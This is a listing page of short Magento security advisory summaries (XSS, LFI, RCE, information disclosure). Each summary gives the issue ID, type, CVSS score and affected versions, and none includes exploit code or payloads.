Category: Magento Commerce

PRODSECBUG-2197: Admin credentials are logged in exception reports

Description: Exception error reports capture administrative credentials in clear text format Type: Information Disclousure CVSSv3 Severity: 3.9 Known Attacks: none Product(s) Affected: Magento Open Source prior to 1.9.4.1, and Magento Commerce prior to 1.14.4.1, Magento 2.1 prior to 2.1.17, Magento

Posted in Information Disclosure, Magento 1, Magento 2, Magento Commerce, Magento Open Source

PRODSECBUG-2184: Stored cross-site scripting in the admin panel via the Terms & Conditions with Checkbox Text field in the admin panel.

Description: An authenticated user with administrative privileges can embed arbitrary code via a stored cross site scripting vulnerability in the Terms & Conditions with Checkbox Text field in the admin panel. Type: General: Cross Site Scripting CVSSv3 Severity: 5.7 Known

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

PRODSECBUG-2178: Stored cross-site scripting in the admin panel via the Admin Shopping Cart Rules page

Type: General: Cross Site Scripting CVSSv3 Severity: 5.8 Known Attacks: none Description: An authenticated user with administrative privileges can embed arbitrary code in the Conditions tab of Admin Shopping Cart Rules page. Product(s) Affected: Magento Open Source prior to 1.9.4.1,

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

PRODSECBUG-2181: Stored cross-site scripting in the Admin Customer Segments area

Description: An authenticated user with privileges to the Customer Segments section of the Admin can use a stored cross site scripting vulnerability to embed malicious code. Type: General: Cross Site Scripting CVSSv3 Severity: 6.5 Known Attacks: none Product(s) Affected: Magento

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

PRODSECBUG-2069: Vulnerability in Attribute Group Name

Description: Reflected XSS can be inserted into an attribute group name in Admin > Stores > Attribute Set. Type: Cross-Site Scripting (XSS) – reflected CVSSv3 Severity: 4.2 Known Attacks: none Product(s) Affected: Magento 2.1 prior to 2.1.16, Magento 2.2 prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Reflected XSS

PRODSECBUG-2146: Remote Code Execution through the Product Media Upload in the Admin

Description: A path traversal vulnerability permits folder creation at arbitrary locations and file deletion from arbitrary locations in the Admin product image/media upload area. Type: Cross-Site Scripting (XSS) CVSSv3 Severity: 6.0 Product(s) Affected: Magento 2.1 prior to 2.1.16, Magento 2.2

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE, Stored XSS

APPSEC-1909: Admin account takeover via File upload information disclosure

Description: It is discovered that Magento reveals HTTPOnly admin session cookie in the response of successful file upload in admin. Because the response content type is JSON, it is possible that attacker can steal admin session cookie by exploiting any

Posted in Authentication Bypass, Magento 2, Magento Commerce, Magento Open Source, Privilege Escalation

APPSEC-2094: Stored XSS – Website to Admin in Global Search

Description: A stored XSS vulnerability from website user targeting admin accounts has been discovered in all the Magento 2.x versions. It’s really easy for an attacker to exploit this. Type: General: Cross Site Scripting (stored) CVSSv3 Severity: 9.6 Product(s) Affected:

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS Tagged with:

APPSEC-2003: RCE via Varnish settings in admin

Description: Admin user can read any file on server and can execute any commands through Varnish. Vulnerability is in the Magento 2.2 admin configuration settings for Varnish, where admin user can whitelist list of IPs (ACL) and download the customized

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE Tagged with: ,

APPSEC-1878/1890: Cross-site Scripting in CMS hierarchy

Description: An administrator with limited privileges can insert script into the CMS hierarchy, which could potentially result in a stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1973: Cross-site Scripting in Newsletter Template

Description: An administrator with limited privileges can embed cross-site scripting elements in the Newsletter template, which could potentially lead to a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open Source

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1947: Cross-site Scripting in RMA functionality

Description: A user can insert script in the RMA SKU field, which could potentially result in a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1

Posted in Magento 2, Magento Commerce, Stored XSS

APPSEC-1945: Cross-site Scripting in Product SKU

Description: An administrator with limited privileges can insert script in the RMA SKU field, which could potentially result in a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open Source prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1944: Cross-site Scripting in Date fields

Description: An administrator with limited privileges can insert script into the private sales events and invitations fields, which can subsequently lead to a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1928: Cross-site Scripting in Downloadable Product Link

Description: An administrator with limited privileges can insert script in the downloadable product link title field, which could subsequently lead to a stored cross-site scripting attack. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento Open

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1916: Cross-site Scripting in Attribute Group Name

Description: An administrator with limited privileges can insert script in the attribute group name field, which could potentially result in stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1908/1948: Cross-site Scripting in custom variable

Description: An administrator with limited privileges can insert script in the custom variables name field, which could potentially result in stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento

Posted in Magento 1, Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1891: Cross-site Scripting in Admin Shipment tracking

Description: An administrator with limited privileges can insert script into the shipment tracking, which could potentially result in stored cross-site scripting that affects other administrators. Type: Cross-site Scripting (XSS) – stored CVSSv3 Severity: 5.0 (Medium) Product(s) Affected: Magento 2.0 prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1986: Local file inclusion in import history

Description: An administrator with limited privileges can delete critical system control files to subsequently gain privilege escalation through the Import History feature. Type: Local File Inclusion (LFI) CVSSv3 Severity: 6.1 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1

Posted in LFI, Magento 2, Magento Commerce, Magento Open Source

APPSEC-1901: Local file inclusion in customer view

Description: An administrator with limited privileges can read arbitrary files from the file system. Type: Local File Inclusion (LFI) CVSSv3 Severity: 6.4 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1 prior to 2.1.12, Magento 2.2 prior to 2.2.3

Posted in LFI, Magento 2, Magento Commerce, Magento Open Source

APPSEC-1907: Cross-site Scripting in Customer Address

Description: A user can insert script into his or her address, which could potentially result in stored cross-site scripting that affects administrators. Type: Cross-site Scripting (XSS) CVSSv3 Severity: 7.5 (High) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento 2.1 prior

Posted in Magento 2, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1952: Remote Code Execution using media upload

Description: An administrator with limited privileges can remotely execute code using a path traversal vulnerability during the CMS image or media upload process. Type: Remote Code Execution (RCE) CVSSv3 Severity: 9.8 (High) Product(s) Affected: Magento 2.0 prior to 2.0.18, Magento

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE

APPSEC-1892: Stored XSS in Visual Merchandiser

Description: An administrator with limited privileges can create a stored-cross site scripting attack in the Visual Merchaniser system. Type: Cross-Site Scripting (XSS, stored) CVSSv3 Severity: 6.1 (Medium) Product(s) Affected: Magento Open Source prior to 1.9.3.7, and Magento Commerce prior to

Posted in Magento 1, Magento Commerce, Magento Open Source, Stored XSS

APPSEC-1910: Local File Inclusion (LFI) in Import History

Description: An administrator with limited privileges can delete critical system control files to subsequently gain privilege escalation through the Import History section. Type: Local File Inclusion + Potential RCE CVSSv3 Severity: 6.1 (Medium) Product(s) Affected: Magento 2.0 prior to 2.0.17,

Posted in LFI, Magento Commerce, Magento Open Source

APPSEC-1900: Remote Code Execution by leveraging 1st stage unsanitized form input

Description: An administrator with limited privileges can create a store website that can accept and run arbitrary remote code execution. Type: Remote Code Execution (RCE) CVSSv3 Severity: 8.2 (High) Product(s) Affected: Magento 2.0 prior to 2.0.17, Magento 2.1 prior to

Posted in Magento 2, Magento Commerce, Magento Open Source, RCE